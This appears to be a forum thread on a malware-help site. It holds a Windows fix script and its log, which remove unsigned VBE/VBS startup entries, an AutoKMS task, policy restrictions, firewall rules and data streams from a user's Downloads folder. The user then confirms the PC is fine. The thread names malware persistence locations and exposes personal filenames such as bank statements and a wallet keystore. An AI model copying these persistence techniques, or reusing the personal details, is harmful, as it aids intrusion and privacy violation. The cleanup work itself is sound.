AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]
FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
C:\WINDOWS\AutoKMS

EmptyTemp:
Hosts:
End
*****************

Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => subkey with invalid name -> removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => subkey with invalid name -> removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => subkey with invalid name -> removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => subkey with invalid name -> removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => subkey with invalid name -> removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => subkey with invalid name -> removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\Drive\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
C:\ProgramData\TEMP => ":0888F409" ADS removed successfully
C:\ProgramData\TEMP => ":3440EB47" ADS removed successfully
C:\ProgramData\TEMP => ":66633281" ADS removed successfully
C:\ProgramData\TEMP => ":93433455" ADS removed successfully
C:\Users\IRENA-PC\Downloads => ":com.dropbox.attrs" ADS could not remove.
C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\102394978_1.jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\ChromeSetup.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\cpg15x => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\desktop (New).ini => ":com.dropbox.attrs" ADS could not remove.
C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\index.php => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\JDownloader => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4 => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Mall rádio.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\PA2018040002.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\plna_moc.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Plná moc.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\priloha1.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\readme.txt => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Spořitelna.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Telegram Desktop => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Ulozto => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\wordpress => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\__MACOSX => ":com.dropbox.attrs" ADS removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe" => removed successfully
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe => moved successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\SunJavaUpdateSched" => removed successfully
"HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Value" => removed successfully
"HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Microsoft Software Essentials" => removed successfully
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\ProgramData\NTUSER.pol => moved successfully
HKLM\SOFTWARE\Policies\Mozilla => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{114D61BE-723E-4720-9A0D-15FEB326AC4B}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{114D61BE-723E-4720-9A0D-15FEB326AC4B}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CD7FA012-E446-4088-B57D-E33EE8969426}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD7FA012-E446-4088-B57D-E33EE8969426}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{DEA268E2-12DD-4984-AB28-F8F89AFCFFCA}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DEA268E2-12DD-4984-AB28-F8F89AFCFFCA}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{EEA50510-8C7D-45F8-BEF4-240855B8A812}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EEA50510-8C7D-45F8-BEF4-240855B8A812}" => removed successfully
C:\WINDOWS\System32\Tasks\AutoKMS => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS" => removed successfully
"C:\WINDOWS\AutoKMS" => not found
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 10772480 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 221777092 B
Java, Flash, Steam htmlcache => 1080 B
Windows/system/drivers => 209262 B
Edge => 33792 B
Chrome => 166347126 B
Brave => 322395 B
Firefox => 10614505 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 34550 B
IRENA-PC => 7177522 B

RecycleBin => 0 B
EmptyTemp: => 398 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 20:16:47 ====

Re: Please check my log

Posted: 20 Jan 2021 20:53
by Rudy
Deleted. Has anything changed?

Re: Please check my log

Posted: 20 Jan 2021 21:27
by chenny
The PC looks fine. Thank you very much for your help and your time :)